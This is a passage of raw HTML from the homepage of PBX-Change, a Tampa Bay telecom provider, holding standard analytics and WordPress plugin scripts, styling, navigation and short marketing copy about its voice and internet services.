bahavior: append; priority: 10; do_shortcode: n) --> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-101620917-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-101620917-1'); </script> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window,document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '189597585173643'); fbq('track', 'PageView'); </script> <noscript> <img height="1" width="1" src="https://www.facebook.com/tr?id=189597585173643&ev=PageView &noscript=1"/> </noscript> <!-- End Facebook Pixel Code --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-PNV8XTV');</script> <!-- End Google Tag Manager --> <style type="text/css"> </style> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.pbx-change.com/?wordfence_lh=1&hid=9C58DFAA2FA980DA79FEDEFAC52128C4'); </script><style type="text/css" id="fusion-branding-style">#wpadminbar .avada-menu>.ab-item .ab-icon:before {background: url( /wp-content/uploads/2018/03/PBX-icon-for-pop.png ) no-repeat center !important;background-size: auto !important;content: ""; width: 21px; height: 21px; display: inline-block; background-size: contain !important;}</style><meta name="generator" content="Powered by Slider Revolution 5.4.7.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <style type="text/css">q { font-size: 15px !important; } #main .fusion-portfolio h2, #main .post h2, #wrapper #main .post h2, #wrapper #main .post-content .fusion-title h2, #wrapper #main .post-content .title h2, #wrapper .fusion-title h2, #wrapper .post-content h2, #wrapper .title h2, .fusion-modal h2, .fusion-widget-area h2, h2.entry-title { font-size: 20px; font-weight: 600; } .fusion-flip-box { font-size: 16px; } h3.flip-box-heading-back { font-size: 20px !important; } /*** Contact Form 7 Style input { height: 45px !important; margin-bottom: 10px; } textarea.wpcf7-form-control.wpcf7-textarea.wpcf7-validates-as-required { margin-bottom: 16px; } input.wpcf7-form-control.wpcf7-submit { padding: 16px 100px; float: right; background-color: #337fba; } **/ /********************* Gravity Form Style for Homepage Start****************************/ label.gfield_label { display: none !important; } li#field_1_1, #field_1_2, #field_1_3, #field_1_4, #field_1_5, #field_1_6 { margin-top: 0px !important; margin-bottom: 0px !important; } input{ width:100% !important; height:50px !important; } input#input_1_1,#input_1_2, #input_1_3, #input_1_4 { margin-bottom: 0px !important; } /********************* Gravity Form Style for Homepage End****************************/ </style><link rel="icon" href="https://www.pbx-change.com/wp-content/uploads/2018/03/cropped-cropped-logo-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.pbx-change.com/wp-content/uploads/2018/03/cropped-cropped-logo-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.pbx-change.com/wp-content/uploads/2018/03/cropped-cropped-logo-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.pbx-change.com/wp-content/uploads/2018/03/cropped-cropped-logo-270x270.png" /> <!-- BEGIN ExactMetrics v5.3.8 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-101620917-1', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <style type="text/css" id="wp-custom-css"> /********************* Gravity Form Style for Homepage Start****************************/ label.gfield_label { display: none !important; } body .gform_wrapper ul li.gfield { margin-top: 0px !important; margin-bottom: 0px !important; } input{ width:100% !important; height:50px !important; } input#input_1_1,#input_1_2, #input_1_3, #input_1_4 { margin-bottom: 0px !important; } /********************* Gravity Form Style for Homepage End****************************/ /******* sale phone number * ********/ a#tampabay-dsl, #business-phone-service, #connectwise, #netsuite ,#salesforce-integration, #intuitive-call-analytics, #intuitive-call-analytics, #q-for-me, #on-net-fiber {display:none;} </style> <script type="text/javascript"> var doc = document.documentElement; doc.setAttribute('data-useragent', navigator.userAgent); </script> </head> <body class="home page-template page-template-100-width page-template-100-width-php page page-id-449 fusion-image-hovers fusion-body ltr fusion-sticky-header no-tablet-sticky-header no-mobile-sticky-header no-mobile-slidingbar no-mobile-totop fusion-disable-outline fusion-sub-menu-fade mobile-logo-pos-left layout-wide-mode fusion-top-header menu-text-align-center mobile-menu-design-modern fusion-show-pagination-text fusion-header-layout-v3 avada-responsive avada-footer-fx-none fusion-search-form-classic fusion-avatar-square"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <div id="wrapper" class=""> <div id="home" style="position:relative;top:-1px;"></div> <header class="fusion-header-wrapper"> <div class="fusion-header-v3 fusion-logo-left fusion-sticky-menu- fusion-sticky-logo-1 fusion-mobile-logo-1 fusion-mobile-menu-design-modern"> <div class="fusion-secondary-header"> <div class="fusion-row"> <div class="fusion-alignleft"> <div class="fusion-contact-info"><a href="tel:(813) 734-8912" id="tampabay-dsl">Sales: (813) 734-8912</a> <a href="tel:813-734-8917" id="business-phone-service">Sales: 813-734-8917 </a> <a href="tel:(813) 734-8915" id="connectwise">Sales: (813) 734-8915</a> <a href="tel:(813) 734-8916" id="netsuite">Sales: (813) 734-8916</a> <a href="tel:(813) 734-8917" id="salesforce-integration">Sales: (813) 734-8917</a> <a href="tel:(813) 734-8918" id="intuitive-call-analytics">Sales: (813) 734-8918</a> <a href="tel:(813) 734-8919" id="q-for-me">Sales: (813) 734-8919</a> <a href="tel:(813) 734-8913" id="on-net-fiber">Sales: (813) 734-8913</a> <a href="tel:(813) 734-8994" id="global-phone">Sales: (813) 734-8994</a> | <a href="mailto:[email protected] ">[email protected] </a> | <a href="tel:(866) 400-8585">Support: (866) 400-8585</a> | <a href="mailto:[email protected] ">[email protected] </a></div> </div> <div class="fusion-alignright"> <div class="fusion-social-links-header"><div class="fusion-social-networks"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-instagram fusion-icon-instagram" style="color:#ffffff;" href="http://instagram.com/PBX_change" target="_blank" rel="noopener noreferrer" data-placement="bottom" data-title="Instagram" data-toggle="tooltip" title="Instagram"><span class="screen-reader-text">Instagram</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-twitter fusion-icon-twitter" style="color:#ffffff;" href="https://twitter.com/PBX_Change" target="_blank" rel="noopener noreferrer" data-placement="bottom" data-title="Twitter" data-toggle="tooltip" title="Twitter"><span class="screen-reader-text">Twitter</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-googleplus fusion-icon-googleplus" style="color:#ffffff;" href="https://plus.google.com/b/108011028230174272745/+Pbx-change?hl=en" target="_blank" rel="noopener noreferrer" data-placement="bottom" data-title="Google+" data-toggle="tooltip" title="Google+"><span class="screen-reader-text">Google+</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-facebook fusion-icon-facebook" style="color:#ffffff;" href="https://www.facebook.com/PBX-Change-Inc-244843757852/" target="_blank" rel="noopener noreferrer" data-placement="bottom" data-title="Facebook" data-toggle="tooltip" title="Facebook"><span class="screen-reader-text">Facebook</span></a></div></div></div> </div> </div> </div> <div class="fusion-header-sticky-height"></div> <div class="fusion-header"> <div class="fusion-row"> <div class="fusion-logo" data-margin-top="31px" data-margin-bottom="31px" data-margin-left="0px" data-margin-right="0px"> <a class="fusion-logo-link" href="https://www.pbx-change.com/" > <!-- standard logo --> <img src="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png" srcset="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png 1x, https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png 2x" width="375" height="93" style="max-height:93px;height:auto;" alt="PBX-Change Logo" data-retina_logo_url="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png" class="fusion-standard-logo" /> <!-- mobile logo --> <img src="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png" srcset="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png 1x, https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png 2x" width="375" height="93" style="max-height:93px;height:auto;" alt="PBX-Change Logo" data-retina_logo_url="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png" class="fusion-mobile-logo" /> <!-- sticky header logo --> <img src="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png" srcset="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png 1x, https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png 2x" width="375" height="93" style="max-height:93px;height:auto;" alt="PBX-Change Logo" data-retina_logo_url="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png" class="fusion-sticky-logo" /> </a> </div> <nav class="fusion-main-menu" aria-label="Main Menu"><ul id="menu-main-menu" class="fusion-menu"><li id="menu-item-817" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-449 current_page_item menu-item-817" data-item-id="817"><a href="https://www.pbx-change.com/" class="fusion-bar-highlight"><span class="menu-text">Home</span></a></li><li id="menu-item-810" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-810" data-item-id="810"><a href="https://www.pbx-change.com/about-5/" class="fusion-bar-highlight"><span class="menu-text">About</span></a></li><li id="menu-item-811" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-811" data-item-id="811"><a href="https://www.pbx-change.com/solutions/" class="fusion-bar-highlight"><span class="menu-text">Solutions</span></a></li><li id="menu-item-1711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1711" data-item-id="1711"><a href="http://www.pbx-change.com/tampabay-dsl/" class="fusion-bar-highlight"><span class="menu-text">Internet</span></a></li><li id="menu-item-812" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-812" data-item-id="812"><a href="https://www.pbx-change.com/contact-us/" class="fusion-bar-highlight"><span class="menu-text">Contact Us</span></a></li><li id="menu-item-813" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-813" data-item-id="813"><a href="https://www.pbx-change.com/customer-resources/" class="fusion-bar-highlight"><span class="menu-text">Customer Resources</span></a></li><li id="menu-item-816" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-816" data-item-id="816"><a href="https://www.pbx-change.com/blog/" class="fusion-bar-highlight"><span class="menu-text">News/Blog</span></a></li></ul></nav> <div class="fusion-mobile-menu-icons"> <a href="#" class="fusion-icon fusion-icon-bars" aria-label="Toggle mobile menu" aria-expanded="false"></a> </div> <nav class="fusion-mobile-nav-holder fusion-mobile-menu-text-align-left" aria-label="Main Menu Mobile"></nav> </div> </div> </div> <div class="fusion-clearfix"></div> </header> <div id="sliders-container"> </div> <main id="main" class="clearfix width-100" style="padding-left:0px;padding-right:0px"> <div class="fusion-row" style="max-width:100%;"> <section id="content" class="full-width"> <div id="post-449" class="post-449 page type-page status-publish hentry"> <span class="entry-title rich-snippet-hidden">Avada Home</span><span class="vcard rich-snippet-hidden"><span class="fn"><a href="https://www.pbx-change.com/author/venerate_pbx/" title="Posts by PBX-Change" rel="author">PBX-Change</a></span></span><span class="updated rich-snippet-hidden">2019-04-03T20:39:38-05:00</span> <div class="post-content"> <div class="fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div id="rev_slider_2_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"> <!-- START REVOLUTION SLIDER 5.4.7.2 auto mode --> <div id="rev_slider_2_1" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.7.2"> <ul> <!-- SLIDE --> <li data-index="rs-4" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXMailer-A_slider-1240x689.png" alt="" title="PBXMailer A_slider (1240&#215;689)" width="1240" height="689" data-bgposition="left top" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-resizeme" id="slide-4-layer-5" data-x="1065" data-y="52" data-width="['none','none','none','none']" data-height="['none','none','none','none']" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;"><img src="https://www.pbx-change.com/wp-content/uploads/2017/08/20-years.png" alt="" data-ww="137px" data-hh="137px" width="360" height="360" data-no-retina> </div> </li> <!-- SLIDE --> <li data-index="rs-4-1" data-transition="fade" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="300" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXMailer-A_slider-1240x689.png" alt="" title="PBXMailer A_slider (1240&#215;689)" width="1240" height="689" data-bgposition="left top" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 2 --> <div class="tp-caption tp-resizeme" id="slide-41-layer-5" data-x="1065" data-y="52" data-width="['none','none','none','none']" data-height="['none','none','none','none']" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;"><img src="https://www.pbx-change.com/wp-content/uploads/2017/08/20-years.png" alt="" data-ww="137px" data-hh="137px" width="360" height="360" data-no-retina> </div> </li> </ul> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); } </script> <script type="text/javascript"> if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_2_1', gridwidth: [1240], gridheight: [602], sliderLayout: 'auto'}); var revapi2, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") tpj.noConflict();} if(tpj("#rev_slider_2_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_2_1"); }else{ revapi2 = tpj("#rev_slider_2_1").show().revolution({ sliderType:"standard", jsFileLocation:"//www.pbx-change.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"auto", dottedOverlay:"none", delay:9000, navigation: { onHoverStop:"off", }, visibilityLevels:[1240,1024,778,480], gridwidth:1240, gridheight:602, lazyType:"none", shadow:0, spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:0, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); }; /* END OF revapi call */ }; /* END OF ON LOAD FUNCTION */ }()); /* END OF WRAPPING FUNCTION */ </script> </div><!-- END REVOLUTION SLIDER --><div class="fusion-clearfix"></div> </div> </div></div></div><div class="fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling" style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:30px;padding-bottom:0px;padding-left:30px;'><div class="fusion-builder-row fusion-row "><div class="fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-2 fusion-one-full fusion-column-first fusion-column-last 1_1" style='margin-top:0px;margin-bottom:20px;'> <div class="fusion-column-wrapper" style="padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;" data-bg-url=""> <div class="fusion-title title fusion-title-1 fusion-title-size-one" style="margin-top:0px;margin-bottom:31px;"><h1 class="title-heading-left" style="margin:0;">Providing Voice &amp; Internet Solutions</h1><div class="title-sep-container"><div class="title-sep sep-double sep-solid" style="border-color:#e0dede;"></div></div></div><div class="fusion-text"><p>PBX-Change understands the challenges faced by businesses in today’s economic climate. We empower our clients with Fortune 500 voice, data, and IT solutions, allowing them to maximize their potential while staying within their budget.</p> <p>PBX-Change is a local; family owned and operated Internet and Telephony Service Provider specializing in voice and cloud services. We provide business communication solutions, support &amp; service to Tampa Bay businesses coupling cutting edge technology with old school integrity.</p> </div><div class="fusion-title title fusion-title-2 fusion-title-size-one" style="margin-top:0px;margin-bottom:31px;"><h1 class="title-heading-left" style="margin:0;">What We Do</h1><div class="title-sep-container"><div class="title-sep sep-double sep-solid" style="border-color:#e0dede;"></div></div></div><div class="fusion-flip-boxes flip-boxes row fusion-columns-4 flip-effect-classic"><div class="fusion-flip-box-wrapper fusion-column col-lg-3 col-md-3 col-sm-3"><div class="fusion-flip-box flip-right"><div class="flip-box-inner-wrapper"><div class="flip-box-front" style="background-color:#ffffff;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#7f7f7f;transition-duration:0.4s;"><div class="flip-box-front-inner"><div class="flip-box-grafix flip-box-image"><img src="/wp-content/uploads/2017/08/orange-small.jpg" width="65" height="65" alt="" /></div><h2 class="flip-box-heading" style="color:#eb8600;">Small Business</h2>Staying competitive in today’s marketplace, we can connect any size business with state-of-the-art communications technology.</div></div><div class="flip-box-back" style="background-color:#1176bc;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#f4f4f4;transition-duration:0.4s;"><div class="flip-box-back-inner"><h3 class="flip-box-heading-back" style="color:#ffffff;">Small Business</h3> <p>Staying competitive in today’s marketplace, we can connect any size business with state-of-the-art communications technology.</p> <div class="fusion-button-wrapper fusion-aligncenter"><style type="text/css" scoped="scoped">.fusion-button.button-1 .fusion-button-text, .fusion-button.button-1 i {color:#ffffff;}.fusion-button.button-1 {border-width:0px;border-color:#ffffff;}.fusion-button.button-1 .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-1:hover .fusion-button-text, .fusion-button.button-1:hover i,.fusion-button.button-1:focus .fusion-button-text, .fusion-button.button-1:focus i,.fusion-button.button-1:active .fusion-button-text, .fusion-button.button-1:active{color:#ffffff;}.fusion-button.button-1:hover, .fusion-button.button-1:focus, .fusion-button.button-1:active{border-width:0px;border-color:#ffffff;}.fusion-button.button-1:hover .fusion-button-icon-divider, .fusion-button.button-1:hover .fusion-button-icon-divider, .fusion-button.button-1:active .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-1{background: #ffb645;}.fusion-button.button-1:hover,.button-1:focus,.fusion-button.button-1:active{background: #ff9900;}.fusion-button.button-1{width:auto;}</style><a class="fusion-button button-flat fusion-button-square button-large button-custom button-1" target="_blank" rel="noopener noreferrer" href="/pbx-small-business"><span class="fusion-button-text">Read More</span></a></div> </div></div></div></div></div><div class="fusion-flip-box-wrapper fusion-column col-lg-3 col-md-3 col-sm-3"><div class="fusion-flip-box flip-right"><div class="flip-box-inner-wrapper"><div class="flip-box-front" style="background-color:#ffffff;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#7f7f7f;transition-duration:0.4s;"><div class="flip-box-front-inner"><div class="flip-box-grafix flip-box-image"><img src="/wp-content/uploads/2017/08/MULTI-SITE-orange.jpg" width="85" height="85" alt="" /></div><h2 class="flip-box-heading" style="color:#eb8600;">Multi site</h2>One solution for all your offices regardless of location. Across the street, across the state, across the world.</div></div><div class="flip-box-back" style="background-color:#1176bc;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#f4f4f4;transition-duration:0.4s;"><div class="flip-box-back-inner"><h3 class="flip-box-heading-back" style="color:#ffffff;">Multi site</h3> <p>One solution for all your offices regardless of location. Across the street, across the state, across the world.<div class="fusion-button-wrapper fusion-aligncenter"><style type="text/css" scoped="scoped">.fusion-button.button-2 .fusion-button-text, .fusion-button.button-2 i {color:#ffffff;}.fusion-button.button-2 {border-width:0px;border-color:#ffffff;}.fusion-button.button-2 .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-2:hover .fusion-button-text, .fusion-button.button-2:hover i,.fusion-button.button-2:focus .fusion-button-text, .fusion-button.button-2:focus i,.fusion-button.button-2:active .fusion-button-text, .fusion-button.button-2:active{color:#ffffff;}.fusion-button.button-2:hover, .fusion-button.button-2:focus, .fusion-button.button-2:active{border-width:0px;border-color:#ffffff;}.fusion-button.button-2:hover .fusion-button-icon-divider, .fusion-button.button-2:hover .fusion-button-icon-divider, .fusion-button.button-2:active .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-2{background: #ffb645;}.fusion-button.button-2:hover,.button-2:focus,.fusion-button.button-2:active{background: #ff9900;}.fusion-button.button-2{width:auto;}</style><a class="fusion-button button-flat fusion-button-square button-large button-custom button-2" target="_blank" rel="noopener noreferrer" href="/multi-site"><span class="fusion-button-text">Read More</span></a></div></div></div></div></div></div><div class="fusion-flip-box-wrapper fusion-column col-lg-3 col-md-3 col-sm-3"><div class="fusion-flip-box flip-right"><div class="flip-box-inner-wrapper"><div class="flip-box-front" style="background-color:#ffffff;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#7f7f7f;transition-duration:0.4s;"><div class="flip-box-front-inner"><div class="flip-box-grafix flip-box-image"><img src="/wp-content/uploads/2017/08/CALL-CENTER-orange.jpg" width="85" height="85" alt="" /></div><h2 class="flip-box-heading" style="color:#eb8600;">Web Collaboration</h2>Host meetings and training sessions online without the hassles associated with similar services.</div></div><div class="flip-box-back" style="background-color:#1176bc;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#f4f4f4;transition-duration:0.4s;"><div class="flip-box-back-inner"><h3 class="flip-box-heading-back" style="color:#ffffff;">Web Collaboration</h3> <p>Host meetings and training sessions online without the hassles associated with similar services.</p> <div class="fusion-button-wrapper fusion-aligncenter"><style type="text/css" scoped="scoped">.fusion-button.button-3 .fusion-button-text, .fusion-button.button-3 i {color:#ffffff;}.fusion-button.button-3 {border-width:0px;border-color:#ffffff;}.fusion-button.button-3 .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-3:hover .fusion-button-text, .fusion-button.button-3:hover i,.fusion-button.button-3:focus .fusion-button-text, .fusion-button.button-3:focus i,.fusion-button.button-3:active .fusion-button-text, .fusion-button.button-3:active{color:#ffffff;}.fusion-button.button-3:hover, .fusion-button.button-3:focus, .fusion-button.button-3:active{border-width:0px;border-color:#ffffff;}.fusion-button.button-3:hover .fusion-button-icon-divider, .fusion-button.button-3:hover .fusion-button-icon-divider, .fusion-button.button-3:active .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-3{background: #ffb645;}.fusion-button.button-3:hover,.button-3:focus,.fusion-button.button-3:active{background: #ff9900;}.fusion-button.button-3{width:auto;}</style><a class="fusion-button button-flat fusion-button-square button-large button-custom button-3" target="_blank" rel="noopener noreferrer" href="/pbx-call-center/"><span class="fusion-button-text">Read More</span></a></div> </div></div></div></div></div><div class="fusion-flip-box-wrapper fusion-column col-lg-3 col-md-3 col-sm-3"><div class="fusion-flip-box flip-right"><div class="flip-box-inner-wrapper"><div class="flip-box-front" style="background-color:#ffffff;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#7f7f7f;transition-duration:0.4s;"><div class="flip-box-front-inner"><div class="flip-box-grafix flip-box-image"><img src="/wp-content/uploads/2017/08/BUILD-ME-SOLUTION-orange.jpg" width="85" height="85" alt="" /></div><h2 class="flip-box-heading" style="color:#eb8600;">Build Me A Solution</h2>Dedicated Internet offers many types of connections including Metro-Ethernet, DSL, T1 </div></div><div class="flip-box-back" style="background-color:#1176bc;border-color:#eaeaea;border-radius:2px;border-style:solid;border-width:1px;color:#f4f4f4;transition-duration:0.4s;"><div class="flip-box-back-inner"><h3 class="flip-box-heading-back" style="color:#ffffff;">Build Me A Solution</h3> <p>Dedicated Internet offers many types of connections including Metro-Ethernet, DSL, T1.</p> <div class="fusion-button-wrapper fusion-aligncenter"><style type="text/css" scoped="scoped">.fusion-button.button-4 .fusion-button-text, .fusion-button.button-4 i {color:#ffffff;}.fusion-button.button-4 {border-width:0px;border-color:#ffffff;}.fusion-button.button-4 .fusion-button-icon-divider{border-color:#ffffff;}.fusion-button.button-4:hover .fusion-button-text, .fusion-button.button-4:hover i,.fusion-button.button-4:focus .fusion-button-text, .fusion-button.button-4:focus i,.fusion-button.button-4:active .fusion-button-text, .fusion-button.button-4:active{color:#ffffff;}.fusion-button.button-4:hover, .fusion-button.button-4:focus, .fusion-button.button-4:active{border-width:0px;border-color:#ffffff;}.fusion-button.button-4:hover .fusion-button-icon-divider, .fusion-button.button-4:hover .fusion-button-icon-divider, .fusion-button.button-4:active 